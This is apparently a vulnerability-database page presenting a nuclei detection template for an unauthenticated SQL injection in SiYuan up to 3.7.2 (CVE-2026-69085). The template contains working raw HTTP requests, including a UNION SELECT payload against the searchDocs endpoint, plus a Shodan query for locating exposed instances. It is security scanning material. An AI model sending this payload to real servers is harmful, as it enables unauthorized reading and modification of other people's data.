Lucene search
+L

SiYuan <=3.7.2 - SQL Injection

🗓️ 18 Sep 2026 08:51:42Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 2 Views

Unauthenticated SQL injection in SiYuan <=3.7.2 via searchDocs endpoint reads/modifies database.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-69085
3 Aug 202613:20
attackerkb
circl
Circl
CVE-2026-69085
4 Aug 202606:02
circl
cve
CVE
CVE-2026-69085
3 Aug 202613:20
cve
cvelist
Cvelist
CVE-2026-69085 SiYuan before v3.7.3 SQL Injection via searchDocs
3 Aug 202613:20
cvelist
githubexploit
GithubExploit
Exploit for CVE-2026-69084
9 Aug 202620:02
githubexploit
euvd
EUVD
EUVD-2026-52278
3 Aug 202613:20
euvd
kitploit
Kitploit
CVE-2026-69084-PoC
11 Sep 202615:52
kitploit
nvd
NVD
CVE-2026-69085
3 Aug 202614:16
nvd
ptsecurity
Positive Technologies
PT-2026-67407
3 Aug 202600:00
ptsecurity
vulnrichment
Vulnrichment
CVE-2026-69085 SiYuan before v3.7.3 SQL Injection via searchDocs
3 Aug 202613:20
vulnrichment
id: CVE-2026-69085

info:
  name: SiYuan <=3.7.2 - SQL Injection
  author: str4k3r
  severity: critical
  description: |
    SiYuan before v3.7.3 contains a SQL injection caused by direct concatenation of the keyword parameter in /api/filetree/searchDocs endpoint, letting attackers with publish RoleReader token or unauthenticated in publish mode read and modify database content.
  impact: |
    Attackers can read and modify database content across all cleartext notebooks, potentially compromising data integrity and confidentiality.
  remediation: |
    Update to version 3.7.3 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-33jq-p8c2-q3q4
    - https://github.com/siyuan-note/siyuan/releases/tag/v3.7.3
    - https://hub.docker.com/r/b3log/siyuan/tags
    - https://nvd.nist.gov/vuln/detail/CVE-2026-69085
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 10
    cve-id: CVE-2026-69085
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    vendor: b3log
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,sqli,sqlite,unauth

http:
  - raw:
      - |
        POST /api/notebook/lsNotebooks HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

      - |
        POST /api/filetree/searchDocs HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"k":"poc%')/**/union/**/select/**/'poc','','poc','','{{box_id}}',sqlite_version(),'/POC','POC','','','','','','',0,'d','','',0,'','',0--"}

    extractors:
      - type: regex
        name: box_id
        part: body
        group: 1
        internal: true
        regex:
          - '"id":"([0-9]{14}-[a-z0-9]{7})"[^}]*"closed":false'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - '"path":"[0-9]+\.[0-9]+\.[0-9]+"'
# digest: 4a0a00473045022067935cafa9b93c74cba46469fffca29680b598daed5a9f6054c45362ec66f372022100c7aee3fb2e48ceb34fd715b549477054d472683588f74c3f937eb0be94e2b4d3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2026 16:56Current
CVSS 49.9
CVSS 3.110
EPSS0.0025
SSVC
2